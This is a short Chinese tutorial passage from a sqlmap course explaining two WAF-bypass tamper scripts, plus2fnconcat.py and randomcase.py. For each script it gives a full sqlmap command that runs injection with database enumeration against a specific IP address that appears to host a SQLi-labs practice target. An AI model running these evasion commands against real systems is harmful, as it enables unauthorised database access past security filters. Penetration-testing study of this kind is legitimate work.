sqlmap从入门到精通-第七章-7-16 绕过WAF脚本-plus2fnconcat.py&randomcase.py

33. plus2fnconcat.py脚本

使用fn concat函数用来替代加号,适用于微软的数据库SQL Server 2008以上

实战演示:

测试地址:python sqlmap.py -u http://106.54.35.126/Less-1/?id=1 --dbs --tamper="plus2fnconcat.py" --proxy="http://127.0.0.1:8080" -batch

 

可以看到是可以注入的,看看burp抓包情况

 ==================================================================================================================================================

34. randomcase.py脚本

随机转换每个关键字字符的大小写。将测试的payload随机大小写,可以用于大小写绕过的情况,适用于所有数据库

实战演示:

测试地址:python sqlmap.py -u http://106.54.35.126/Less-1/?id=1 --dbs --tamper="randomcase.py" --proxy="http://127.0.0.1:8080" -batch

可以进行注入,burp抓包效果看看

发现也确认进行了随机大小写转换 

迷茫的人生,需要不断努力,才能看清远方模糊的志向!
【推广】 免费学中医,健康全家人
原文地址:https://www.cnblogs.com/autopwn/p/13563497.html